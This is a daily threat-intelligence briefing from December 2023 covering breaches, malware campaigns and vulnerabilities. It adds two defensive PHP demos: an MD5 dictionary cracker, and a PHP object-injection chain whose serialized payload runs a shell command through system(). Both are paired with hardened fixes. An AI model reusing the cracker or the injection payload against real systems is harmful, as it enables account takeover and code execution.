
Cyware Daily Threat Intelligence


Daily Threat Briefing Dec 8, 2023

Microsoft Windows users are being warned about MrAnon Stealer, delivered through fake hotel booking emails. The campaign primarily targets Germany, with a surge in activity observed in November 2023. In parallel, a bug in fleet management software has raised fresh concerns about the safety of drivers and passengers, and about the risks of automation in the logistics sector: exploiting the flaw could compromise backend infrastructure and affect thousands of vehicles at once.

What else? Progress Software, maker of the MOVEit file-transfer product, disclosed two new high-severity vulnerabilities, bringing the total to eight CVEs since the zero-day exploited in May. Meanwhile, cyber agencies warned that Star Blizzard, a Russian APT, is back in action.

Top Breaches Reported in the Last 24 Hours

Star Blizzard targets U.S. and U.K.

CISA and partner Western agencies have warned of Star Blizzard, a Russian cyber-espionage group linked to the FSB. The group targets organizations in the U.S. and U.K., with activity also observed in other NATO countries and in countries neighboring Russia. Star Blizzard has expanded its targeting to the defense-industrial base and U.S. Department of Energy (DoE) facilities. It relies on carefully targeted spear-phishing emails sent to personal addresses, bypassing the security controls of the victim's corporate network.

Akira ransomware Group claims two victims

The Akira ransomware group added two new victims to its list: Compass Group Italia, an Italy-based company, and Aqualectra Utility, a government-owned utility provider in Curaçao. In posts on a dark web forum, the group claims to have obtained 107GB of sensitive data from Compass Group Italia and to have compromised Aqualectra Utility's operational files, business documents, and payment records.

Android app leaks sensitive data

The Barcode to Sheet Android app was found leaking sensitive user and enterprise data. The Cybernews team discovered that the app's developers had left its Firebase database open, exposing over 368MB of data. The exposed data included enterprise information stored in plaintext, user passwords stored as MD5 hashes, and various application secrets and access keys. MD5 is a fast general-purpose hash, not a password hash: without a salt and a work factor, hashed passwords can be recovered offline in seconds from a wordlist, so the leak is a ready-made source for phishing, credential stuffing, and other attacks.
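To show why MD5-hashed passwords in a leak are close to plaintext, and what a password store should do instead, here is an added PHP example. It is not code from the Cybernews report or from the app; the user rows and the wordlist are constructed for the demo.

```php
<?php
// Added example, not code from the Cybernews report or the app: why a leaked
// table of MD5 password hashes is nearly as bad as plaintext, and how a
// password store should be built instead.

// Constructed sample rows. The hashes are generated here from weak passwords
// purely for the demo; a real leak would contain only the hashes.
$leakedRows = [
    ['user' => 'alice', 'hash' => md5('Password1')],
    ['user' => 'bob',   'hash' => md5('123456')],
    ['user' => 'carol', 'hash' => md5('3xQ!vLp9#mz2Rw')],
];

// A tiny constructed wordlist. Real attackers use billions of candidates and
// test them at tens of billions of MD5 hashes per second on commodity GPUs.
$wordlist = ['123456', 'password', 'Password1', 'qwerty', 'letmein'];

/**
 * Dictionary attack on unsalted MD5: one md5() per candidate, computed once
 * and reused against every row, because identical passwords give identical
 * hashes. Returns user => recovered password.
 */
function crackMd5(array $rows, array $wordlist): array
{
    $lookup = [];
    foreach ($wordlist as $candidate) {
        $lookup[md5($candidate)] = $candidate;
    }
    $recovered = [];
    foreach ($rows as $row) {
        if (isset($lookup[$row['hash']])) {
            $recovered[$row['user']] = $lookup[$row['hash']];
        }
    }
    return $recovered;
}

// Every user whose password appears in the wordlist falls with a single
// table lookup; a user survives only if the password is not in the list.
print_r(crackMd5($leakedRows, $wordlist));

/**
 * Hardened form: a salted, deliberately slow password hash. password_hash()
 * chooses the algorithm (bcrypt for PASSWORD_DEFAULT today), generates a
 * random salt, and embeds algorithm, cost and salt in the returned string.
 */
function storePassword(string $plain): string
{
    return password_hash($plain, PASSWORD_DEFAULT, ['cost' => 12]);
}

function checkPassword(string $plain, string $stored): bool
{
    return password_verify($plain, $stored);
}

$stored = storePassword('Password1');
var_dump(checkPassword('Password1', $stored));
var_dump(checkPassword('Password2', $stored));
// The random salt makes two hashes of the same password differ, so a
// precomputed lookup table like $lookup above cannot be reused across users.
var_dump(storePassword('Password1') === $stored);
```

The cost parameter is the work factor: raise it until a verification takes a noticeable fraction of a second on the server, which turns the attacker's billions of guesses per second into a few thousand.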

Top Malware Reported in the Last 24 Hours

Phishing campaign deploys MrAnon Stealer

FortiGuard Labs uncovered a phishing campaign that uses fake hotel booking details to lure victims into opening a malicious PDF file. The PDF, when opened, downloads a .NET executable built with PowerGUI, which runs a PowerShell script to fetch and execute the final payload, MrAnon Stealer. The stealer is written in Python and bundled into a standalone executable with cx_Freeze to evade detection. It steals victims' credentials, system information, browser sessions, and data from cryptocurrency wallet browser extensions.

HeadCrab malware resurfaces with new variant

Aqua Security researchers have identified a second variant of HeadCrab, a malware family that builds botnets out of Redis servers for cryptomining and other attacks. The new variant has infected 1,100 Redis servers. Although not a traditional rootkit, it takes control of Redis functions and their responses, rewriting what the server returns so that the infection is practically invisible to an administrator querying it. The remaining changes are minor: custom commands were removed and encryption was added to the command-and-control channel.

Top Vulnerabilities Reported in the Last 24 Hours

Severe bug found in fleet management software

A serious vulnerability in the Syrus4 IoT gateway, a fleet-management device made by Digital Communications Technologies (DCT), lets attackers manipulate and potentially shut down vehicles at scale, according to Yashin Mehaboobe, a security consultant at Xebia, who discovered it. The flaw, CVE-2023-6248, allows unauthorized access to the gateway software, giving an attacker live locations, engine diagnostics, control of speakers and airbags, and the ability to execute arbitrary code on thousands of vehicles. The issue was first reported to the vendor in April.

Two new high-severity MOVEit flaws spotted

Progress Software has disclosed two new high-severity vulnerabilities in its MOVEit file-transfer product: a privilege escalation flaw (CVE-2023-6218) and a cross-site scripting flaw (CVE-2023-6217). They bring the total to eight CVEs in MOVEit since the zero-day (CVE-2023-34362) that the Clop ransomware group exploited in late May. Progress Software says it has seen no evidence of active exploitation of the new vulnerabilities so far.

WordPress addresses RCE bug

The WordPress team released version 6.4.2 to fix a critical Remote Code Execution (RCE) issue in WordPress core 6.4. The flaw is a Property Oriented Programming (POP) chain: a class in core whose magic methods can be steered into executing arbitrary PHP when an attacker controls every property of a deserialized object. The chain is not exploitable in core on its own; it needs a PHP object injection bug (an unserialize() call on attacker-controlled data) elsewhere, typically in a plugin, and the impact is greater on multisite installations.
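A minimal POP chain makes the "attacker controls all properties" condition concrete. The following is an added PHP example, not WordPress code: the LogFlusher class, its properties and the payload are invented for illustration, and stand in for a core gadget plus a plugin-supplied unserialize() sink.

```php
<?php
// Added example, not WordPress code: a minimal property-oriented programming
// (POP) chain and the fix. LogFlusher, its properties and the payload are
// invented for illustration.

// The "gadget": an innocent-looking class, such as one shipped in core. On
// destruction it hands its buffer to a configurable writer. Nothing here is
// a sink on its own, which is why such classes pass code review.
class LogFlusher
{
    public $enabled = true;
    public $writer  = 'error_log';
    public $buffer  = '';

    public function __destruct()
    {
        // After unserialize() all three properties hold attacker-chosen
        // values: the guard, the callable and its argument.
        if ($this->enabled && is_callable($this->writer)) {
            call_user_func($this->writer, $this->buffer);
        }
    }
}

// The sink: a code path that unserializes attacker-controlled data (a
// cookie, an option value, a form field). This is the PHP object injection
// bug that a plugin must contribute; the gadget alone does nothing.
function vulnerableSink(string $untrusted): void
{
    $obj = unserialize($untrusted);
    // When $obj goes out of scope, LogFlusher::__destruct runs with the
    // properties from the payload, i.e. system('id -un').
}

// The attacker's payload: a serialized LogFlusher with every property set.
$payload = 'O:10:"LogFlusher":3:{s:7:"enabled";b:1;'
         . 's:6:"writer";s:6:"system";'
         . 's:6:"buffer";s:6:"id -un";}';

vulnerableSink($payload);

// Hardened sink. First choice: never unserialize untrusted input; use JSON
// for data interchange. If the format cannot change, forbid object
// instantiation so that no gadget's magic method can ever run.
function hardenedSink(string $untrusted)
{
    // Objects come back as __PHP_Incomplete_Class: no LogFlusher, no
    // __destruct, no call_user_func.
    return unserialize($untrusted, ['allowed_classes' => false]);
}

var_dump(get_class(hardenedSink($payload)));
```

The fix in core removes or neutralizes the gadget, but plugins that unserialize untrusted data remain object injection bugs in their own right; auditing for unserialize() on request-derived input is the durable check.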
